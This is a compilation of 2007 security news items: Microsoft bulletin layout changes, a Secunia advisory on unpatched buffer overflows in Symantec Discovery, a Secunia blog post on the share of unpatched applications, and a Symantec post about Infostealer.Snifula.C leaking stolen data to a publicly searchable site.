As always, you can subscribe to the ANS and other alerts here: http://www.microsoft.com/technet/security/bulletin/notify.mspx.

Security Bulletin Design Changes:

We’ve also spent a lot of time talking to customers about the layout of our security bulletins and how we can improve them. Customers very clearly pointed out that they were satisfied with the level of technical detail in the bulletins but needed to be able to more quickly determine the severity of the bulletin and its applicability to their environment. With that in mind, we set out to accomplish the following goals:

· Move all applicable decision making information to the top of the page

· Create a table of affected products (instead of a list) with links to the download location of the updates

· Change the section titles to be more representative of the content under them

· Re-arrange content to areas that make them more intuitive to find

· Reduce some of the repetitive content in the bulletin

Rather than try to fully describe the changes to the bulletin format, we have provided a sample of an actual bulletin (MS07-016 Cumulative Security Update for Internet Explorer (928090)) for you to preview:

http://www.microsoft.com/technet/security/bulletin/ms07-016-example-of-new-layout.mspx

We hope that these changes make your decision making process more efficient. We will continue to listen to your feedback and implement additional changes as needed.

Thanks! We appreciate all the feedback!

*This posting is provided "AS IS" with no warranties, and confers no rights.*

Anonymous comments are disabled

Source: The Microsoft Security Response Center (MSRC) : ANS and Security Bulletin Updates

Symantec Discovery XferWan.exe Packet Parsing Buffer Overflows

Secunia Advisory:
SA24281

Release Date:
2007-05-16

Critical:

Moderately critical

Impact:
System access

Where:
From local network

Solution Status:
Unpatched

Software:
Symantec Discovery 6.x

CVE reference:
CVE-2007-1173 (Secunia mirror)

Description:
Secunia Research has discovered two vulnerabilities in Symantec Discovery, which can be exploited by malicious people to compromise a vulnerable system.

For more information:
SA24090

The vulnerabilities are confirmed in version 6.5. Other versions may also be affected.

Solution:
The vendor is working on a patch, which will be available soon.

Only allow connections from trusted clients.

Disable the CentennialIPTransferServer service.

Provided and/or discovered by:
Dyon Balding, Secunia Research.

Original Advisory:
Secunia Research:
http://secunia.com/secunia_research/2007-42/

Other References:
SA24090:
http://secunia.com/advisories/24090/

Source: Symantec Discovery XferWan.exe Packet Parsing Buffer Overflows - Advisories - Secunia

28% of all detected applications are insecure 13:36 CET on the 16th May 2007. Entry written by Jakob Balle. Since its release in December of last year, the free, online Secunia Software Inspector has conducted over 350,000 inspections. These inspections have identified 4.9 million popular applications (as listed here), and out of those, 1.4 million applications were found to be lacking critical security patches from the vendors.

While most people are aware of the need to update their anti-virus patterns and to raise their firewall shields, it appears that too many users either don't know that their systems are vulnerable to significant issues or that they simply don't want to spend the necessary time scouring for vulnerability information and the relevant vendor patches to properly address the issues.

This fact is further highlighted if we dig deeper into the figures behind the fact that 28% of all detected applications by the Software Inspector are vulnerable.

Comparing browsers and looking at Firefox, Opera and Internet Explorer, we found out that Firefox 2 is the least vulnerable, as only 5.19% of all Firefox 2 installations miss security updates, whereas 11.96% of all Opera 9.x installations miss security updates, and the numbers for IE6 and IE7 are 9.61% and 5.4% respectively. These numbers are not that alarming and show that users are fairly concerned about applying relevant updates for their browsers – which naturally is one of the most exposed applications.

But looking at media players such as Quicktime and WinAMP, then the figures are more worrying, as 26.96% of all WinAMP 5 installations miss important security updates and 33,14% of all Quicktime 7 installations are outdated.

Most people using Windows and Microsoft products are usually aware of the monthly “Patch Tuesday” routine that Microsoft has set up, which can explain why the patch level for MS products are relatively high. These numbers also indicate that many people using Firefox and Opera are concerned about security and remember to keep their products updated.

But when it comes to other applications that don't immediately seem that exposed, people tend to wait for an extended period of time before patching.

This constitutes a significant problem because many of those applications, like WinAMP and Quicktime, are readily used whenever users encounter media files of various kinds. Most people wouldn't hesitate to open an .mpg, .jpg, .mov, or .mp3 file from any source if it seems the least bit interesting and relevant. It's easy to embed a movie in your homepage, for example, and all it takes is one unpatched Quicktime vulnerability and a provocative video title to compromise a lot of visitors.

Comparing this with the figures we have for corporate environments, there isn't much of a difference, though the vulnerable applications tend to be more business-like in nature, exploiting flaws in enterprise software and devices rather than media players. However, the overall picture is the same: the operating systems, browsers, and Microsoft applications in general appear to be updated fairly regularly. But all other applications seem to be forgotten, or receive too low a priority given the severity of the issues, and the fact is that exploits are available for a great deal of them. Not to mention that corporations have much more to lose than just their credit card details; there's client lists, design blueprints, employee information, and more at stake.

The need for tools to provide proper and exact information about which security updates are missing on both private PCs and corporate networks seem to be critical.

For half a year the Secunia Software Inspector has been available free of charge, with the purpose of highlighting the most important and common security issues in the most common user-end applications. This approach is fine for private individuals with a one or two PCs but for the network administrators with multiple systems this approach isn't feasible.

To help companies Secunia has developed a new tool called the Secunia Network Software Inspector (NSI). For the last 3 weeks this has been available in a public BETA for corporate users. A total of more than 1,600 IT administrators from all over the world, from small and medium businesses to global corporations, have tested it.

The Secunia NSI can be deployed from a central server and configured to inspect multiple machines in a network. It is also capable of identifying more than 4,000 unique applications, down to the specific version number and patch level, as well as which applications are missing security updates and which ones have reached end-of-life. The feedback of the beta testing has been overwhelmingly positive, and we are grateful to all the BETA testers who participated in this event.

The Secunia NSI is now available for corporate users in a full version. For more information please see:
http://secunia.com/network_software_inspector/

The Secunia Software Inspector is still available FREE of charge in an easy to use Java version. It is continuously updated with new signatures to identify the latest versions and missing patches for over 40 popular applications:
http://secunia.com/software_inspector/

Best regards,

Jakob Balle
IT Development Manager

Source: 28% of all detected applications are insecure - Blog - Secunia

Found Your Password on a Search Engine

Recently we found a new malware called Infostealer.Snifula.C. The main purpose of malware is to steal confidential information from a compromised computer and send it to a certain web site. The author of the malware can obtain the information from the site and make money with it. To make matters worse, the web site has no access control and anyone can access the information there.

As I'm writing this, more than 300MB logs are at the site and we can see a huge collection of confidential information such as names, addresses, phone and credit card numbers, and login information for email, online banking, MySpace, or eBay. And all of this information can be accessed through search engines.

I think the Infostealer.Snifula.C author does not intend to release the stolen information to the public and this happened by accident. However, for victims, this is a nightmare. Anyone in the world can get your confidential information.
If you are infected with the malware, you should remove it and make sure that your accounts for both online and offline services are safe. Even if you are not infected, you may be surprised at what you can find out about yourself through a search engine!

Posted by Kaoru Hayashi on May 15, 2007 08:00 AM

Source: Symantec Security Response Weblog: Found Your Password on a Search Engine